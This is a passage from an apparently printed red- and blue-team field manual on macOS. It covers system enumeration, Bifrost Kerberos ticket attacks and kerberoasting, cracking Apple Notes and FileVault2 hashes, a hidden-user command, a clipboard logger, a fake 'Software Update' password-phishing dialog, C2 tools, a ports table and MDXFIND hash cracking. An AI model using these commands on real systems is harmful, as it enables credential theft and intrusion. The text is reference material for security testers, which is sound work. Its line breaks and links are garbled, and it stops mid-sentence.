%%[Link]%%/Library/Caches/Chromium/*
" /Cache/*
%%[Link]%%/Library/Application
Chromium Support/Chromium/*/Application
Application Cache Cache/Cache/*
Chromium Media %%[Link]%%/Library/Caches/Chromium/*
Cache /Media Cache/*
%%[Link]%%/Library/Application
Chromium GPU Cache Support/Chromium/*/GPUCache/*
Chromium PNaCl %%[Link]%%/Library/Caches/Chromium/P
translation cache naclTranslationCache/*
Chromium %%[Link]%%/Library/Application
Preferences Support/Chromium/*/Preferences
%%[Link]%%/Library/Application
Chromium Extensions Support/Chromium/*/Extensions/**10
Chromium Extensions %%[Link]%%/Library/Application
Activity Support/Chromium/*/Extension Activity
MAIL
Mail Main Folder %%[Link]%%/Library/Mail/V[0-9]/*
Mail Mailbox %%[Link]%%/Library/Mail/V[0-
Directory 9]/Mailboxes/*
Mail IMAP Synched %%[Link]%%/Library/Mail/V[0-9]/IMAP-
Mailboxes <name@address>/*
Mail POP Synched %%[Link]%%/Library/Mail/V[0-9]/POP-
Mailboxes <name@address>/*
%%[Link]%%/Library/Mail/V[0-
Mail BackupTOC 9]/MailData/[Link]
%%[Link]%%/Library/Mail/V[0-
Mail Envelope Index 9]/MailData/Envelope Index
Mail Opened %%[Link]%%/Library/Mail/V[0-
Attachments 9]/MailData/[Link]
Mail Signatures by %%[Link]%%/Library/Mail/V[0-
Account 9]/MailData/Signatures/*.plist
Mail Downloads %%[Link]%%/Library/Containers/[Link]
Directory [Link]/Data/Library/Mail Downloads/*
%%[Link]%%/Library/Preferences/com.a
Mail Preferences [Link]
Mail Recent %%[Link]%%/Library/Application
Contacts Support/AddressBook/[Link]
%%[Link]%%/Library/Mail/V[0-
Mail Accounts 9]/MailData/[Link]

173
REFERENCE:
[Link]
[Link]
[Link]
collection
[Link]
[Link]
CfxHLOW_GNGpX8/edit#gid=1317205466
[Link]
[Link]
[Link]
%20response%20on%[Link]
[Link]
Infection_Analysis_.pdf
[Link]
[Link]
[Link]

M M
MACOS_Exploit
RED TEAM EXPLOITATION MacOS

macOS SURVEY
SYSTEM_PROFILER Everything about your MacOS Setup
system_profiler > ~/Desktop/system_profile.txt

Show OS Build
sw_vers

Cat OS Build
cat /System/Library/CoreServices/[Link]

Show System Software Version

sw_vers -productVersion

Show CPU Brand String

sysctl -n [Link].brand_string

FileVault Status
fdesetup status

List All Hardware Ports

networksetup -listallhardwareports

Generate Advanced System and Performance Report

sudo sysdiagnose -f ~/Desktop/

174
Display Status of Loaded Kernel Extensions
sudo kextstat -l

Get Password Policy

pwpolicy getaccountpolicies

Enumerate Groups
groups

Cached Kerberos Tickets (if present)

klist
klist -c <cache>

Enrolled in MDM Solution

sudo /usr/bin/profiles status -type enrollment

LSREGISTER-Paths are searched for applications to register with the

Launch Service database.
/System/Library/Frameworks/[Link]/Frameworks/Launch
[Link]/Support/lsregister -dump

List all packages and apps install history

cat /Library/Receipts/[Link]
ls -lart /private/var/db/receipts/

List All Apps Downloaded from App Store

# Via Spotlight
mdfind kMDItemAppStoreHasReceipt=1

Show All Attached Disks and Partitions

diskutil list

Run a wireless network scan:

/System/Library/PrivateFrameworks/[Link]/Versions/Cur
rent/Resources/airport -s

Show Current SSID:

/System/Library/PrivateFrameworks/[Link]/Versions/Cur
rent/Resources/airport -I | awk '/ SSID/ {print substr($0,
index($0, $2))}'

Show WiFi Connection History:

defaults read
/Library/Preferences/SystemConfiguration/[Link]
ces | grep LastConnected -A 7

Bluetooth Status

175
defaults read /Library/Preferences/[Link]
ControllerPowerState

Show Memory Statistics

# One time
vm_stat
# Table of data, repeat 10 times total, 1 second wait between each
poll
vm_stat -c 10 1

macOS ENUMERATION
DNS-SD ENUMERATION ON LOCAL NETWORK
Printer Services Example
#Browse local network for services:
dns-sd -B _services._dns-sd._udp local.
#Locate devices serving printers services:
dns-sd -B _ipp._tcp local.
#Lookup information about device:
dns-sd -L "Brother HL-L2350DW series" _ipp._tcp local.
#Lookup IP information about host:
dns-sd -Gv4v6 [Link]
SMB Services Example
#Browse local network for services:
dns-sd -B _services._dns-sd._udp local.
#Locate devices serving SMB services:
dns-sd -B _smb._tcp local.
#Lookup information about device:
dns-sd -L "TimeCapsule" _smb._tcp local.
#Lookup IP information about host:
dns-sd -Gv4v6 [Link]

IPPFIND Enumerate/Find Local Printers

#Locate printers on local network
ippfind
#Enumerate hostnames for printers
ippfind _ipp._tcp,_universal --exec echo '{service_hostname}' \;
#Advanced enumeration of printers info:
ippfind _ipp._tcp,_universal --exec dns-sd -G v4
'{service_hostname}' \;

Use Bonjour to locate other AFP services on network

dns-sd -B _afpovertcp._tcp

Active Directory Enumeration

dscl "/Active Directory/<domain>/All Domains" ls /Computers
dscl "/Active Directory/<domain>/All Domains" ls /Users

176
dscl "/Active Directory/<domain>/All Domains" read
/Users/<username>

Enumerate Basic Active Directory info for user

dscl . cat /Users/<username>

List Local Accounts with Admin rights

dscl . read /Groups/admin

Show domain info and admin AD groups

dsconfigad -show

Enumerate Users and Groups and Admins

dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
dscacheutil -q group
dscacheutil -q group -a gid 80
dscacheutil -q user

List all profiles for user in Open Directory

dscl -u <ADMIN_USER> -P <PASS> <OD_Server> profilelist
/LDAPv3/[Link]/Users/<USER>

BITFROST (Kerberos on macOS)

Goal of the project is to enable better security testing around
Kerberos on macOS devices using native APIs without requiring any
other framework or packages on the target.

LIST
Loop through all of the credential caches in memory and give basic
information about each cache and each entry within.
bitfrost -action list

DUMP TICKETS
Iterate through the default credential cache.
bitfrost -action dump -source tickets

DUMP KEYTABS
Attempt to dump information from the default keytab
(/etc/[Link]) which is only readable by root.
bitfrost -action dump -source keytab

ASKHASH
Compute the necessary hashes used to request TGTs and decrypt
responses. This command requires the plaintext password
**Supply a base64 encoded version of the password with -bpassword

177
bifrost -action askhash -username lab_admin -domain [Link] -
bpassword YWJjMTIzISEh

ASKTGT
Take a plaintext password, a hash, or a keytab entry and request a
TGT from the DC.
#With Base64 Password
bifrost -action asktgt -username lab_admin -domain [Link] -
bpassword YWJjMTIzISEh
#With Hash
bifrost -action asktgt -username lab_admin -domain [Link] -
enctype aes256 -hash
2DE49D76499F89DEA6DFA62D0EA7FEDFD108EC52936740E2450786A92616D1E1 -
tgtEnctype rc4
#With Keytab
bifrost -action asktgt -username lab_admin -domain [Link] -
enctype aes256 -keytab test

DESCRIBE
Command will parse out the information of a Kirbi file. You need to
supply -ticket [base64 of Kirbi ticket]
bifrost -action describe -ticket doIFIDCCBRygBgIEAA<...snip...>Uw=

ASKTGS
Command will ask the KDC for a service ticket based on a supplied
TGT. You need to supply -ticket [base64 of kirbi TGT] and -service
[spn,spn,spn]
bifrost -action asktgs -ticket doIFIDC<...snip...>Uw= -service
cifs/[Link],host/[Link]

KERBEROASTING
Want service ticket to be rc4 and something more crackable, specify
the -kerberoast true
bifrost -action asktgs -ticket doIF<...snip...>QUw= -service
host/[Link] -kerberoast true

PTT
Command takes a ticket (TGT or service ticket) and imports it to a
specified credential cache or creates a new credential cache.
bifrost -action ptt -cache new -ticket doI<...snip...>QUw=

REFERENCE:
[Link]
[Link]

Dylib Hijacking
By abusing various features and undocumented aspects of OS X’s
dynamic loader, attackers need only to ‘plant’ specially crafted

178
dynamic libraries to have malicious code automatically loaded into
vulnerable applications.

REFERENCE:
[Link]
[Link]
[Link]
[Link]
20CON%2023%20-%[Link]
[Link]
[Link]
[Link]

AIRSPY (AIRDROP EXPLORATION)

AirSpy is a tool for exploring Apple's AirDrop protocol
implementation on i/macOS, from the server's perspective. Dumps
requests and responses along with a linear code coverage trace of
the code processing each request.

REFERENCE:
[Link]
[Link]

Crack Apple Secure Notes

STEP 1: Copy sqlite ‘NotesV#.storedata’ from target located at:
/Users/<username>/Library/Containers/[Link]/Data/Library/N
otes/
#Notes Version based on OS
Mountain Lion = [Link]
Mavericks = [Link]
Yosemite = [Link]
El Capitan & Sierra = [Link]
High Sierra = [Link]

STEP 2: Download John’s ‘applenotes2john’ and point it at the

sqlite database. Note this script also extracts the hints if
present in the database and appends them to the end of the hash
(Example ‘company logo?’):
[Link]

[Link] NotesV#.storedata

NotesV#.storedata:$ASN$*4*20000*caff9d98b629cad13d54f5f3cbae2b85*79
270514692c7a9d971a1ab6f6d22ba42c0514c29408[Link]ompany logo?

STEP 3: Format and load hash into John (--format=notes-opencl) or

Hashcat (-m 16200) to crack.

Crack Apple FileVault2 Disk Encryption

179
STEP 1: Use dd to extract image of your FileVault2 encrypted disk:
sudo dd if=/dev/disk2 of=/path/to/filevault_image.dd
conv=noerror,sync

STEP 2: Install fvde2john from [Link]

STEP 3: Use hdiutil to attach to dd image:

hdiutil attach -imagekey diskimage-class=CRawDiskImage -nomount
/Volumes/path/to/filevault_image.dd

STEP 4: Obtain the [Link] from “Recovery HD”

partition
[Link]
encryptedrootplistwipekey
mmls /Volumes/path/to/filevault_image.dd
fls -r -o 50480752 /Volumes/path/to/filevault_image.dd | grep -i
EncryptedRoot
+++++ r/r 130: [Link]

icat -o 50480752 [Link] 130 > [Link]

STEP 5: Verify and note the disk mount point for Apple_Corestorage:
diskutil list
…/dev/disk3s2 Apple_Corestorage

STEP 6: Use [Link] with fvdeinfo to retrieve

the hash:
sudo fvdetools/fvdeinfo -e [Link] -p blahblah
/dev/disk3s2
$fvde$1$16$96836044060108438487434858307513$41000$e9acbb4bc6dafb74a
adb72c576fecf69c2ad45ccd4776d76

STEP 7: Load this hash into JTR or Hashcat to crack

john --format=FVDE-opencl --wordlist=[Link] [Link]

hashcat –a 0 –m 16700 [Link] [Link]

Crack Apple File System MacOS up to 10.13

STEP 1: Install apfs2john per the github instructions located at:
[Link]

STEP 2: Point ‘apfs2john’ at the your device or disk image:

sudo ./bin/apfs-dump-quick /dev/sdc1 [Link]

sudo ./bin/apfs-dump-quick [Link] [Link]

180
!!Consider using ‘kpartx’ for handling disk images per Kholia
recommendations: [Link]

macOS MISC
Dump Clipboard Contents Continuously
while true; do echo -e "\n$(pbpaste)" >>/tmp/[Link] && sleep
5; done

Add a hidden user on MacOS

sudo dscl . -create /Users/#{user_name} UniqueID 333

Extract All Certificates

security find-certificate -a -p

Locate Bookmark Database for Firefox & Chrome

#Write out to /tmp file:
find / -path "*/Firefox/Profiles/*/[Link]" -exec echo {} >>
/tmp/[Link] \;
find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >>
/tmp/[Link] \;

Locate Browser History: Safari, Chrome, Firefox

Parse browser history:
[Link]
parser/tree/master/parse-browser-history
#Safari History
~/Library/Safari/[Link]
#Chrome History
~/Library/Application Support/Google/Chrome/Default/History
#Firefox History
~/Library/Application Support/Profiles<random>.default-
release/[Link]

Prompt User for Password (Local Phishing)

osascript -e 'tell app "System Preferences" to activate' -e 'tell
app "System Preferences" to activate' -e 'tell app "System
Preferences" to display dialog "Software Update requires that you
type your password to apply changes." & return & return default
answer "" with icon 1 with hidden answer with title "Software
Update"'

C2 TOOLS
PUPY
Pupy is a cross-platform, multi function RAT and post-exploitation
tool mainly written in python. It features an all-in-memory
execution guideline and leaves a very low footprint.

181
[Link]

APFELL
A cross-platform, post-exploit, red teaming framework built with
python3, docker, docker-compose, and a web browser UI. It's
designed to provide a collaborative and user friendly interface for
operators, managers, and reporting throughout mac and linux based
red teaming.
[Link]

M M
MACOS_Hardening
BLUE TEAM CONFIGURATION MacOS

MacOS Hardening Guide

[Link]
10.14/ERNW_Hardening_OS_X_Mojave.md

M M
MACOS_Ports
ALL INFORMATIONAL MacOS
Historical OSX/macOS services and ports for all versions.

Port Proto App Proto System Service Name

7 TCP/UDP echo —
20 TCP ftp-data —
21 TCP ftp —
Xcode Server ( Git+SSH;
22 TCP ssh SVN+SSH)
23 TCP telnet —
25 TCP smtp Mail
53 TCP/UDP domain —
67 UDP bootps NetBoot via DHCP
68 UDP bootpc NetBoot via DHCP
69 UDP tftp —
79 TCP finger —
80 TCP http World Wide Web
Kerberos, Screen Sharing
88 TCP kerberos authentication
macOS Server Password
106 TCP 3com-tsmux Server
110 TCP pop3 Mail

182
111 TCP/UDP sunrpc Portmap (sunrpc)
113 TCP ident —
119 TCP nntp Apps that read newsgroups.
network time server
123 UDP ntp synchronization
137 UDP netbios-ns —
138 UDP netbios-dgm Windows Datagram Service
Microsoft Windows file and
139 TCP netbios-ssn print services
143 TCP imap Mail (receiving email)
161 UDP snmp —
AirPort Base Station PPP
status or discovery,
AirPort Admin Utility,
192 UDP osu-nms AirPort Express Assistant
Server app, Server Admin,
Workgroup Manager, Server
311 TCP asip-webadmin Monitor, Xsan Admin
Xsan Admin (OS X Mountain
312 TCP vslmp Lion v10.8 and later)
Apps that look up
addresses, such as Mail and
389 TCP ldap Address Book
427 TCP/UDP svrloc Network Browser
443 TCP https TLS websites
445 TCP microsoft-ds —
464 TCP/UDP kpasswd —
465 TCP smtp (legacy) Mail (sending mail)
500 UDP isakmp macOS Server VPN service
500 UDP IKEv2 Wi-Fi Calling
514 TCP shell —
514 UDP syslog —
Printing to a network
printer, Printer Sharing in
515 TCP printer macOS
532 TCP netnews —
AppleShare, Personal File
548 TCP afpovertcp Sharing, Apple File Service
AirPlay, QuickTime
Streaming Server (QTSS),
554 TCP/UDP rtsp streaming media players
Mail (sending mail), iCloud
587 TCP submission Mail (SMTP authentication)
600–1023 TCP/UDP ipcserver NetInfo
623 UDP asf-rmcp Lights Out Monitoring (LOM)
Open Directory, Server app,
Workgroup Manager;
Directory Services in OS X
625 TCP dec_dlm Lion or earlier

183
 This port is registered to
DEC DLM
IMAP administration (Mac OS
X Server v10.2.8 or
626 TCP asia earlier)
Server serial number
registration (Xsan, Mac OS
626 UDP asia X Server v10.3 – v10.6)
macOS Printer Sharing,
printing to many common
631 TCP ipp printers
636 TCP ldaps Secure LDAP
Server administration tools
for Mac OS X Server v10.4
mac-srvr- or earlier, including
660 TCP admin AppleShare IP
Server administration tools
for Mac OS X Server v10.6
or earlier, including
687 TCP asipregistry AppleShare IP
749 TCP/UDP kerberos-adm Kerberos 5
985 TCP — NetInfo Static Port
993 TCP imaps iCloud Mail (SSL IMAP)
995 TCP/UDP pop3s Mail IMAP SSL
1085 TCP/UDP webobjects —
1099, 804
3 TCP rmiregistry Remote RMI & IIOP JBOSS
qt- Administration of QuickTime
1220 TCP serveradmin Streaming Server
cert- Profile Manager in macOS
1640 TCP responder Server 5.2 and earlier
1649 TCP kermit —
1701 UDP l2f macOS Server VPN service
1723 TCP pptp macOS Server VPN service
1900 UDP ssdp Bonjour
2049 TCP/UDP nfsd —
2195 TCP — Push notifications
2196 TCP — Feedback service
2197 TCP — Push notifications
appleugcontro Home directory
2336 TCP l synchronization
3004 TCP csoftragent —
Program Linking, Remote
3031 TCP/UDP eppc Apple Events
Apple Remote Desktop 2.0 or
later (Reporting
feature), Classroom
3283 TCP/UDP net-assistant app (command channel)
Classroom app (document
3284 TCP/UDP net-assistant sharing)

184
3306 TCP mysql —
nat-stun-port
-
ipether232por
3478–3497 UDP t FaceTime, Game Center
3632 TCP distcc —
macOS Server Password
3659 TCP/UDP apple-sasl Server
iTunes Music Sharing,
3689 TCP daap AirPlay
Xcode Server (anonymous
3690 TCP/UDP svn remote SVN)
4111 TCP xgrid —
4398 UDP — Game Center
4488 TCP awacs-ice
4500 UDP ipsec-msft macOS Server VPN service
4500 UDP IKEv2 Wi-Fi Calling
fmpro-
5003 TCP internal —
AirPort Utility, AirPort
5009 TCP winfs Express Assistant
macOS camera and scanner
5100 TCP socalia sharing
5222 TCP jabber-client Jabber messages
iCloud DAV Services, Push
Notifications, FaceTime,
iMessage, Game Center,
5223 TCP — Photo Stream
5228 TCP — Spotlight Suggestions, Siri
5297 TCP — Messages (local traffic)
5350 UDP — Bonjour
5351 UDP nat-pmp Bonjour
Bonjour, AirPlay, Home
5353 UDP mdns Sharing, Printer Discovery
Can be enabled manually in
OS X Lion Server
(previously enabled by
default for ARD 2.0
5432 TCP postgresql Database)
5897–5898 UDP — xrdiags
Apple Remote Desktop 2.0 or
later (Observe/Control
feature)
Screen Sharing (Mac OS X
5900 TCP vnc-server 10.5 or later)
Apple Remote Desktop 2.x
See
also [Link]/standards/wbe
5988 TCP wbem-http m.
6970–9999 UDP — QuickTime Streaming Server

185
 QuickTime Streaming Server
7070 TCP arcp (RTSP)
7070 UDP arcp QuickTime Streaming Server
Web service, iTunes Radio
8000–8999 TCP irdmi streams
8005 TCP — —
Mac OS X Server v10.5 or
8008 TCP http-alt later
Also JBOSS HTTP in Mac OS X
8080 TCP http-alt Server 10.4 or earlier
Mac OS X Server v10.5 or
8085–8087 TCP — later
Mac OS X Server v10.4 or
8088 TCP radan-http later
Mac OS X Server v10.6 or
8089 TCP — later
Mac OS X Server v10.6.3 or
8096 TCP — later
8170 TCP — Podcast Capture/podcast CLI
8171 TCP — Podcast Capture/podcast CLI
pcastagentd (such as for
control operations and
8175 TCP — camera)
Mac OS X Server v10.5 or
later (JBOSS HTTPS in Mac
OS X Server 10.4 or
8443 TCP pcsync-https earlier)
Mac OS X Server v10.6 or
8800 TCP sunwebadmin later
Mac OS X Server v10.6 or
8843 TCP — later
8821, 882
6 TCP — Final Cut Server
Final Cut Server (data
8891 TCP — transfers)
Mac OS X Server v10.6 or
9006 TCP — earlier
Printing to certain network
9100 TCP — printers
9418 TCP/UDP git Xcode Server (remote git)
macOS Server iOS file
10548 TCP serverdocs sharing
11211 — — Calendar Server
Web service with
16080 TCP — performance cache
16384– Messages (Audio RTP, RTCP;
16403 UDP — Video RTP, RTCP)
16384–
16387 UDP — FaceTime, Game Center

186
 16393–
16402 UDP — FaceTime, Game Center
16403–
16472 UDP — Game Center
24000– Web service with
24999 TCP med-ltp performance cache
42000–
42999 TCP — iTunes Radio streams
49152–
65535 TCP — Xsan Filesystem Access
49152–
65535 UDP —
50003 — — —
50006 — — —

REFERENCE:
[Link]

M M
MACOS_Structure
ALL INFORMATIONAL MacOS

DIRECTORY DESCRIPTION
Root directory, present on
virtually all UNIX based file
systems. Parent directory of all
/ other files
This file Desktop Service Store
contains Finder settings, such as
icon location, position of icons,
choice of a background image,
window size and the names of all
.DS_Store files (and also directories) in
that folder. The file will appear
in any directory that you’ve
viewed with the Finder and and
has functions similar to the file
[Link] in MicrosoftWindows.
DocumentRevisions-V100 is an
internal version control system
introduced by Apple in OSX Lion.
Large database that saves a copy
.DocumentRevisions-V100/ of a file each, track changes,
revert, each every time you save
it. Apple uses it for TextEdit,
KeyNote, Pages, Numbers, and some
other programs. Developers can

187
 also interact with this API in
their apps.
File system events daemon process
that writes file system event log
files and is responsible for
handling changes to the file
.fseventsd/
system. Directory acts as a
staging or buffer area for
notifications for userspace
process.
.HFS+ Private Directory Data\r
and HFS+ Private Data are special
folders used by the HFS+
filesystem to handle hard-linked
folders and files, respectively.
HFS+ doesn’t support hard links
and UNIX, upon which macOS is
.HFS+ Private Directory based, requires them. So
Data?/ developer macOS simulated hard
links; any file that has more
than one link is moved into one
of these invisible directories as
an inode; the actual hard links
are just aliases to the inode
file with a special flag set in
its metadata.
Used for software updates and the
.PKInstallSandboxManager/
Sandbox
.PKInstallSandboxManager-
Used for system software updates
SystemSoftware/
.Spotlight-V100/ Spotlight index data for searches
Trash folder, stored individually
on each mounted volume, contains
files that have been placed in
.Trashes/ Trash. On a boot volume, such
files are stored in ~/.Trash . On
a non-boot volume, these files
are in /.Trashes/$UID/
A pseudo-directory used to access
files by their ID or inode
.vol/ number, maps HFS+ file IDs to
files. If you know a file’s ID,
you can open it using /.vol/ID
Contains all Mac OS X
/Applications/
applications
Essential common binaries and
/bin/ files/programs needed to boot the
operating system.
Symbolic link to /private/cores .
/cores/
If core dumps are enabled they

188
 are created in this directory as
[Link]
Files that represent various
/dev/ peripheral devices including
keyboards, mice, trackpads
Symbolic link to /private/etc and
contains machine local system
/etc/->private/etc/ configuration, holds
administrative, configuration,
and other system files.
All User files stored: documents,
music,movies, pictures,
/home/
downloads, etc… Every User has a
home directory.
Shared libraries, settings,
preferences, and other
necessities [An additional
/Library/
Libraries folder in your home
directory, which holds files
specific to that user].
Common default automounter local
path is of the form
/net/hostname/nfspath where
/net/ hostname is the host name of the
remote machine and nfspath is the
path that is exported over NFS on
the remote machine.
Location to attach network-wide
resources and server volumes. OS
X 10.1, network resources are
mounted in /private/Network with
/Network/
symbolic links. OS 10.3, various
network resources (mainly
servers) appear dynamically in
/Network
Optional installations such as
/opt/
X11
On typical Unix system tmp, var,
/private/ etc, and cores directories would
be located.
Contains executables for system
/sbin/
administration and configuration
Contains system related files,
libraries, preferences, critical
/System/
for the proper function of Mac OS
X
Symbolic link to /private/tmp and
/tmp/ holds temporary files and caches,
which can be written by any user.

189
 /User Information/ ->
/Library/Documentation/User PDF Manuals
[Link]
All user accounts on the machine
/Users/ and their accompanying unique
files, settings, etc.
Contains BSD Unix applications
and support files. Includes
subdirectories that contain
/usr/
information, configuration files,
and other essentials used by the
operating system
Symbolic link to /private/var and
contains miscellaneous data,
/var/ configuration files and
frequently modified files, such
as log files.
Used to store the swap files for
Mac OS X’s virtual memory &
/vm/
contents of RAM for sleep
operations.
Mounted devices and volumes,
either virtual or real. Hard
/Volumes/
disks, CD’s, DVD’s, DMG mounts
and the boot volume

REFERENCE:
[Link]
[Link]

M M
MACOS_Tricks
ALL MISC MacOS

Generate Secure Password & Copy to Clipboard

LC_ALL=C tr -dc "[:alnum:]" < /dev/urandom | head -c 20 | pbcopy

Show External IP Address

Method #1
dig +short [Link] @[Link]
Method #2
curl -s [Link] && echo

Eject All Mountable Volumes

osascript -e 'tell application "Finder" to eject (every disk whose
ejectable is true)'

190
Set Login Window Text
sudo defaults write /Library/Preferences/[Link]
LoginwindowText "Your text"

Preview via QuickLook

qlmanage -p /path/to/file

Search via Spotlight

mdfind -name 'searchterm'

Show Spotlight Indexed Metadata

mdls /path/to/file

Speak Text with System Default Voice

say 'All your base are belong to us!'

Prevent sleep for 1 hour:

caffeinate -u -t 3600

Generate UUID to Clipboard

uuidgen | tr -d '\n' | tr '[:upper:]' '[:lower:]' | pbcopy

Open Applications
open -a "Google Chrome" [Link]

MacOS Performance Monitoring with Powermetrics

powermetrics -a 0 -i 15000 -s tasks --show-process-io --show-
process-energy -u /tmp/[Link]
# -a 0 Don't display summary line
# -i 15000 Collect data every 15 seconds
# -s tasks Focus on per-process information
# --show-process-io Add disk i/o and pageins to results
# --show-process-energy Show energy impact scores
# -u /tmp/[Link] Output to file location
**Splunk regex for parsing powermetrics logs
index="your_index_here" sourcetype=generic_single_line
| rex field="_raw" "(?P<process_name>^[\w \(\)\-
\.]+)(\b|\))\s{3,}(?P<pid>[\d]+)\s+(?P<cpu_ms_s>[\d\.]+)\s+(?P<perc
ent_cpu_user>[\d\.]+)\s+(?P<deadlines_lt_2ms>[\d\.]+)\s+(?P<deadlin
es_2_to_5ms>[\d\.]+)\s+(?P<wakeups>[\d\.]+)\s+(?P<intr_pkg_idle>[\d
\.]+)\s+(?P<bytes_read>[\d\.]+)\s+(?P<bytes_written>[\d\.]+)\s+(?P<
pageins>[\d\.]+)\s+(?P<energy_impact>[\d\.]+)"

macOS CONFIGURATION
Join a Wi-Fi Network
networksetup -setairportnetwork en0 WIFI_SSID WIFI_PASSWORD

191
Turn WIFI Adapter On
networksetup -setairportpower en0 on

Firewall Service
# Show Status
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --
getglobalstate

# Enable
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --
setglobalstate on

# Disable (Default)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --
setglobalstate off

Remote Apple Events

# Status
sudo systemsetup -getremoteappleevents
# Enable
sudo systemsetup -setremoteappleevents on
# Disable (Default)
sudo systemsetup -setremoteappleevents off

AirDrop
# Enable AirDrop over Ethernet and on Unsupported Macs
defaults write [Link] BrowseAllInterfaces -bool
true
# Enable (Default)
defaults remove [Link] DisableAirDrop
# Disable
defaults write [Link] DisableAirDrop -bool YES

Force Launch Screen Saver

# Up to Sierra
open
/System/Library/Frameworks/[Link]/Versions/A/Resourc
es/[Link]
# From High Sierra
/System/Library/CoreServices/[Link]/Contents/MacOS/S
creenSaverEngine

Start Native TFTP Daemon

#Files will be served from /private/tftpboot.
sudo launchctl load -F /System/Library/LaunchDaemons/[Link] &&
\
sudo launchctl start [Link]

192
Activate/Deactivate the ARD Agent and Helper
# Activate And Restart the ARD Agent and Helper
sudo
/System/Library/CoreServices/RemoteManagement/[Link]/Contents
/Resources/kickstart -activate -restart -agent -console
# Deactivate and Stop the Remote Management Service
sudo
/System/Library/CoreServices/RemoteManagement/[Link]/Contents
/Resources/kickstart -deactivate -stop

Enable/Disable Remote Desktop Sharing

# Allow Access for All Users and Give All Users Full Access
sudo
/System/Library/CoreServices/RemoteManagement/[Link]/Contents
/Resources/kickstart -configure -allowAccessFor -allUsers -privs -
all
# Disable ARD Agent and Remove Access Privileges for All Users
sudo
/System/Library/CoreServices/RemoteManagement/[Link]/Contents
/Resources/kickstart -deactivate -configure -access -off

Remove Apple Remote Desktop Settings

sudo rm -rf /var/db/RemoteManagement ; \
sudo defaults delete
/Library/Preferences/[Link] ; \
defaults delete
~/Library/Preferences/[Link] ; \
sudo rm -r /Library/Application\ Support/Apple/Remote\ Desktop/ ; \
rm -r ~/Library/Application\ Support/Remote\ Desktop/ ; \
rm -r ~/Library/Containers/[Link]

REFERENCE:
[Link]
with-a-Mac/
[Link]
[Link]
[Link]

M M
MACOS_Versions
ALL INFORMATIONAL MacOS

Version Date Darwin Latest

Rhapsody Developer 31-Aug-97 DR2
OS X Server 1.0 16-Mar-99 1.2v3
OS X Developer 16-Mar-99 DP4
OS X Beta Kodiak 13-Sep-00 1.2.1

193
 OS X 10.0 Cheetah 24-Mar-01 1.3.1 10.0.4
OS X 10.1 Puma 25-Sep-01 1.4.1 /5 10.1.5
OS X 10.2 Jaguar 24-Aug-02 6 10.2.8
OS X 10.3 Panther 24-Oct-03 7 10.3.9
OS X 10.4 Tiger 29-Apr-05 8 10.4.11
OS X 10.5 Leopard 26-Oct-07 9 10.5.8
OSX 10.6 Snow Leopard 09-Jun-08 10 10.6.8 v1.1
OS X 10.7 Lion 20-Jul-11 11 10.7.5
OS X 10.8 Mountain Lion 25-Jul-12 12 10.8.5
OS X 10.9 Mavericks 22-Oct-13 13 10.9.5
OS X 10.10 Yosemite 16-Oct-14 14 10.10.5
OS X 10.11 El Capitan 30-Sep-15 15 10.11.6
macOS 10.12 Sierra 20-Sep-16 16 10.12.6
macOS 10.13 High Sierra 25-Sep-17 17 10.13.6
macOS 10.14 Mojave 24-Sep-18 18 10.14.6
macOS 10.15 Catalina 7-Oct-19 19 10.15.2

REFERENCE:
[Link]

M M
MALWARE_Resources
BLUE TEAM REVERSE ENG ALL

MALWARE REPOSITORIES
Clean MX
Realtime database of malware and malicious domains.
[Link]

Contagio
A collection of recent malware samples and analyses.
[Link]

Exploit Database
Exploit and shellcode samples.
[Link]

Infosec - CERT-PA
Malware samples collection and analysis.
[Link]

InQuest Labs
Evergrowing searchable corpus of malicious Microsoft documents.
[Link]

Malpedia

194
A resource providing rapid identification and actionable context
for malware investigations.
[Link]

Malshare
Large repository of malware actively scrapped from malicious sites.
[Link]

Objective-See
MacOS malware samples
[Link]

Tracker h3x
Aggregator for malware corpus tracker and malicious download sites.
[Link]

VirusBay
Community-Based malware repository and social network.
[Link]

VirusShare
Malware repository, registration required.
[Link]

Zeltser's Sources
A list of malware sample sources put together by Lenny Zeltser.
[Link]

VX-UNDERGROUND
Polyswarm supported malware samples free for all.
[Link]

theZOO
A repository of LIVE malwares for your own joy and pleasure. theZoo
is a project created to make the possibility of malware analysis
open and available to the public. [Link]
[Link]

AlphaSecLab
Malware writeups on samples
[Link]

COMMAMD & CONTROL RESEARCH

C2 Matrix
It is the golden age of Command and Control (C2) frameworks. The
goal of this site is to point you to the best C2 framework for your
needs based on your adversary emulation plan and the target
environment. Take a look at the matrix or use the questionnaire to
determine which fits your needs.
[Link]

195
REFERENCE:
[Link]

M M
MDXFIND / MDXSPLIT
RED TEAM PASSWORD CRACKING ALL
MDXFIND is a program which allows you to run large numbers of
unsolved hashes of any type, using many algorithms concurrently,
against a large number of plaintext words and rules, very quickly.
It’s main purpose was to deal with large lists (20 million, 50
million, etc) of unsolved hashes and run them against new
dictionaries as you acquire them.

So when would you use MDXFIND on a pentest? If you dump a database

tied to website authentication and the hashes are not cracking by
standard attack plans. The hashes may be generated in a unique
nested hashing series. If you are able to view the source code of
said website to view the custom hashing function you can direct
MDXFIND to replicate that hashing series. If not, you can still run
MDXFIND using some of the below ‘Generic Attack Plans’. MDXFIND is
tailored toward intermediate to expert level password cracking but
is extremely powerful and flexible.

Example website SHA1 custom hashing function performing multiple

iterations:

$hash = sha1($password . $salt);

for ($i = 1; $i <= 65000; ++$i)
{
$hash = sha1($hash . $salt);
}

MDXFIND
COMMAND STRUCTURE THREE METHODS 1-STDOUT 2-STDIN 3-File

1- Reads hashes coming from cat (or other) commands stdout.

cat [Link] | mdxfind -h <regex #type> -i <#iterations> [Link] >
[Link]

2- Takes stdin from outside attack sources in place of [Link]

when using the options variable ‘-f’ to specify [Link] file
location and variable ‘stdin’.
[Link] ?d?d?d?d?d?d | mdxfind -h <regex #type> -i <#iterations> -
f [Link] stdin > [Link]

196
3- Specify file location ‘-f’ with no external stdout/stdin
sources.
mdxfind -h <regex #type> -i <#iterations> -f [Link] [Link] >
[Link]

[FULL LIST OF OPTIONS]

-a Do email address munging
-b Expand each word into unicode, best effort
-c Replace each special char (<>&, etc) with XML equivalents
-d De-duplicate wordlists, best effort...but best to do ahead
of time
-e Extended search for truncated hashes
-p Print source (filename) of found plain-texts
-q Internal iteration counts for SHA1MD5x, and others. For
example, if you have a hash that is
